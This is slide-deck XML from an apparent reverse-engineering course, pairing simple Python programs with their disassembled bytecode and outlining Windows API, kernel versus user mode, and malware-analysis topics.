                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="12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9          48 LOAD_FAST                0 (a)</a:t>
            </a:r>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50 LOAD_FAST                1 (b)</a:t>
            </a:r>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52 BINARY_TRUE_DIVIDE</a:t>
            </a:r>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54 STORE_FAST               2 (c)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="12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10          56 LOAD_FAST                0 (a)</a:t>
            </a:r>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58 LOAD_CONST               4 (3)</a:t>
            </a:r>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60 BINARY_MODULO</a:t>
            </a:r>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62 STORE_FAST               1 (b)</a:t>
            </a:r>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64 LOAD_CONST               0 (None)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>             66 RETURN_VALUE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial Narrow"/>
              <a:ea typeface="Arial Narrow"/>
              <a:cs typeface="Arial Narrow"/>
              <a:sym typeface="Arial Narrow"/>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01"/>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Recognizing Python structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1021" name="Google Shape;1021;p101"/>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Condition</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>if</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022" name="Google Shape;1022;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="2348880"/>
            <a:ext cx="3141886" cy="1754326"/>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x = 1;</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y = 2;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>If x == y :</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>print("x equals y.\n");</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else:</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print("x is not equal to y.\n")</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1023" name="Google Shape;1023;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4427984" y="1412776"/>
            <a:ext cx="4271169" cy="5047536"/>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1           0 LOAD_CONST               0 (1)</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2 STORE_NAME               0 (x)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="14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2           4 LOAD_CONST               1 (2)</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6 STORE_NAME               1 (y)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="14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3           8 LOAD_NAME                0 (x)</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10 LOAD_NAME                1 (y)</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12 COMPARE_OP               2 (==)</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14 POP_JUMP_IF_FALSE       26</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="14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4          16 LOAD_NAME                2 (print)</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18 LOAD_CONST               2 ('x equals y.\n')</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20 CALL_FUNCTION            1</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22 POP_TOP</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24 JUMP_FORWARD             8 (to 34)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="14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6     &gt;&gt;   26 LOAD_NAME                2 (print)</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28 LOAD_CONST               3 ('x is not equal to y.\n')</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30 CALL_FUNCTION            1</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32 POP_TOP</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&gt;&gt;   34 LOAD_CONST               4 (None)</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36 RETURN_VALUE</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02"/>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Recognizing Python structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1029" name="Google Shape;1029;p102"/>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i="1" lang="en-GB"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> loop</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Google Shape;1030;p102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4644008" y="1628800"/>
            <a:ext cx="3451586" cy="3754874"/>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3           0 SETUP_LOOP              26 (to 28)</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2 LOAD_GLOBAL              0 (range)</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4 LOAD_CONST               1 (100)</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6 CALL_FUNCTION            1</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8 GET_ITER</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&gt;&gt;   10 FOR_ITER                14 (to 26)</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12 STORE_FAST               0 (i)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="14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4          14 LOAD_GLOBAL              1 (print)</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16 LOAD_CONST               2 ('i equals ')</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18 LOAD_FAST                0 (i)</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20 CALL_FUNCTION            2</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22 POP_TOP</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24 JUMP_ABSOLUTE           10</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&gt;&gt;   26 POP_BLOCK</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&gt;&gt;   28 LOAD_CONST               0 (None)</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30 RETURN_VALUE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Google Shape;1031;p102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="2382272"/>
            <a:ext cx="2871299" cy="2585323"/>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def main():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for i in range(100):</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print("i equals ", i);</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if __name__ == "__main__":</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main()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03"/>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Recognizing Python structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1037" name="Google Shape;1037;p103"/>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String</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1038" name="Google Shape;1038;p103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1761045"/>
            <a:ext cx="3275127" cy="3139321"/>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import dis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def myfunc():</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#string</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tmp_str=input("Enter string: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tmp_str = tmp_str[:-3]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tmp_str = tmp_str[-4:]</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print(tmp_str)</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if __name__ == '__main__':</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myfunc()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1039" name="Google Shape;1039;p103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4125446" y="1196752"/>
            <a:ext cx="3780202" cy="5478423"/>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12 LOAD_GLOBAL              0 (input)</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14 LOAD_CONST               2 ('Enter string: ')</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16 CALL_FUNCTION            1</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18 STORE_FAST               2 (tmp_str)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="14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8          20 LOAD_FAST                2 (tmp_str)</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22 LOAD_CONST               0 (None)</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24 LOAD_CONST               3 (-3)</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26 BUILD_SLICE              2</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28 BINARY_SUBSCR</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30 STORE_FAST               2 (tmp_str)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="14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9          32 LOAD_FAST                2 (tmp_str)</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34 LOAD_CONST               4 (-4)</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36 LOAD_CONST               0 (None)</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38 BUILD_SLICE              2</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40 BINARY_SUBSCR</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42 STORE_FAST               2 (tmp_str)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="14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10          44 LOAD_GLOBAL              1 (print)</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46 LOAD_FAST                2 (tmp_str)</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48 CALL_FUNCTION            1</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50 POP_TOP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="14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04"/>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Recognizing Python structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1045" name="Google Shape;1045;p104"/>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List</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1046" name="Google Shape;1046;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1761045"/>
            <a:ext cx="3912353" cy="2862322"/>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import dis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def myfunc():</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mylist = ["apple", "banana", "cherry"]</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mylist.append("orange")</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list(mylist)</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if __name__ == '__main__':</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myfunc()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1047" name="Google Shape;1047;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4788024" y="1761045"/>
            <a:ext cx="3374642" cy="4185761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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12        52 LOAD_CONST               5 ('apple')</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54 LOAD_CONST               6 ('banana')</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56 LOAD_CONST               7 ('cherry')</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58 BUILD_LIST                   3</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="14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60 STORE_FAST                 3 (mylist)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="14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13       62 LOAD_FAST                   3 (mylist)</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64 LOAD_METHOD           2 (append)</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66 LOAD_CONST               8 ('orange')</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68 CALL_METHOD             1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="14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70 POP_TOP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="14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14       72 LOAD_GLOBAL              3 (list)</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74 LOAD_FAST                    3 (mylist)</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76 CALL_FUNCTION           1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="14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78 POP_TOP</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80 LOAD_CONST                0 (None)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>             82 RETURN_VALUE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial Narrow"/>
              <a:ea typeface="Arial Narrow"/>
              <a:cs typeface="Arial Narrow"/>
              <a:sym typeface="Arial Narrow"/>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05"/>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Analyzing Malwares of Windows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054" name="Google Shape;1054;p105"/>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Windows API</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Handles, File System functions, Special files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Windows API &amp; Registry</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Windows API &amp; Networking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Bekerly socket, WinINET API</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Existences of running malwares</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Thread, Process, Mutex, Service, COM, Exception</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Kernel &amp; User mode</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pic>
        <p:nvPicPr>
          <p:cNvPr descr="block diagram of user-mode and kernel-mode components" id="1059" name="Google Shape;1059;p106"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3203848" y="1905299"/>
            <a:ext cx="5740896" cy="4776606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Google Shape;1060;p106"/>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Kernel vs. User mode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1061" name="Google Shape;1061;p106"/>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GB"/>
              <a:t>Windows has two processor privilege levels</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>kernel mode </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>user mode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SYSENTER</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SYSCALL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>INT 0x2E</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Kernel mode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Antivirus</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Firewall</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malware (e.g.rootkit)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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07"/>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Windows API</a:t>
            </a:r>
